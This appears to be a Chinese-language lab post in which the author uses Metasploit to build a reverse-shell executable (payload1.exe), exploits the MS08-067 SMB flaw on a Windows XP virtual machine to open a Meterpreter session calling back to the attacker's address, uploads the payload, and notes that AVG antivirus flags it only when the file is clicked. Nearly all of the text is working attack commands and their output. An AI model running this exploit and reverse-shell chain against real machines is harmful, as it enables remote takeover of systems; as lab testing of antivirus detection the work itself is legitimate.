在网上下载了avg杀毒软件,在虚拟机XP上安装了一下,然后,把metasploit生成的payload1.exe上传到XP的C盘。
root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 X > payload1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: {"LHOST"=>"192.168.1.11", "LPORT"=>"31337"}
root@bt:~# ls
Desktop payload1.exe
root@bt:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set TARGET 41
TARGET => 41
msf exploit(ms08_067_netapi) > setg LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(ms08_067_netapi) > setg LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > setg RHOST 192.168.1.142
RHOST => 192.168.1.142
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.11:8080
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 1 opened (192.168.1.11:8080 -> 192.168.1.142:1075) at 2013-04-28 03:52:27 -0400
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd ..
meterpreter > cd ..
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-04-28 05:06:49 -0400 $AVG
100777/rwxrwxrwx 0 fil 2012-03-23 23:55:53 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2012-03-23 23:55:53 -0400 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2012-03-23 23:59:48 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2012-03-23 23:55:53 -0400 IO.SYS
100444/r--r--r-- 0 fil 2012-03-23 23:55:53 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-14 08:00:00 -0400 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2013-04-28 05:08:25 -0400 Program Files
40777/rwxrwxrwx 0 dir 2013-04-28 09:27:28 -0400 RECYCLER
40777/rwxrwxrwx 0 dir 2012-03-23 23:59:34 -0400 System Volume Information
40777/rwxrwxrwx 0 dir 2013-04-28 08:45:45 -0400 WINDOWS
100777/rwxrwxrwx 131820480 fil 2013-04-28 04:06:33 -0400 avg_free_x86_all_2013.exe
100666/rw-rw-rw- 211 fil 2012-03-23 23:51:49 -0400 boot.ini
100444/r--r--r-- 322730 fil 2008-04-14 08:00:00 -0400 bootfont.bin
100444/r--r--r-- 257728 fil 2008-04-14 08:00:00 -0400 ntldr
100666/rw-rw-rw- 805306368 fil 2013-04-29 07:53:11 -0400 pagefile.sys
100666/rw-rw-rw- 38 fil 2013-04-28 09:37:16 -0400 readme.txt
40777/rwxrwxrwx 0 dir 2013-04-28 03:19:27 -0400 ruby
meterpreter > upload payload1.exe
[*] uploading : payload1.exe -> payload1.exe
[*] uploaded : payload1.exe -> payload1.exe
meterpreter > ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-04-28 05:06:49 -0400 $AVG
100777/rwxrwxrwx 0 fil 2012-03-23 23:55:53 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2012-03-23 23:55:53 -0400 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2012-03-23 23:59:48 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2012-03-23 23:55:53 -0400 IO.SYS
100444/r--r--r-- 0 fil 2012-03-23 23:55:53 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-14 08:00:00 -0400 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2013-04-28 05:08:25 -0400 Program Files
40777/rwxrwxrwx 0 dir 2013-04-28 09:27:28 -0400 RECYCLER
40777/rwxrwxrwx 0 dir 2012-03-23 23:59:34 -0400 System Volume Information
40777/rwxrwxrwx 0 dir 2013-04-28 08:45:45 -0400 WINDOWS
100777/rwxrwxrwx 131820480 fil 2013-04-28 04:06:33 -0400 avg_free_x86_all_2013.exe
100666/rw-rw-rw- 211 fil 2012-03-23 23:51:49 -0400 boot.ini
100444/r--r--r-- 322730 fil 2008-04-14 08:00:00 -0400 bootfont.bin
100444/r--r--r-- 257728 fil 2008-04-14 08:00:00 -0400 ntldr
100666/rw-rw-rw- 805306368 fil 2013-04-29 07:53:11 -0400 pagefile.sys
100777/rwxrwxrwx 73802 fil 2013-04-29 08:07:14 -0400 payload1.exe
100666/rw-rw-rw- 38 fil 2013-04-28 09:37:16 -0400 readme.txt
40777/rwxrwxrwx 0 dir 2013-04-28 03:19:27 -0400 ruby
meterpreter >
XP里是:
杀毒软件是没有报告威胁的。
我点击C盘里的其他文件,也是没有报威胁的,只有点击“payload1.exe”时,才报威胁。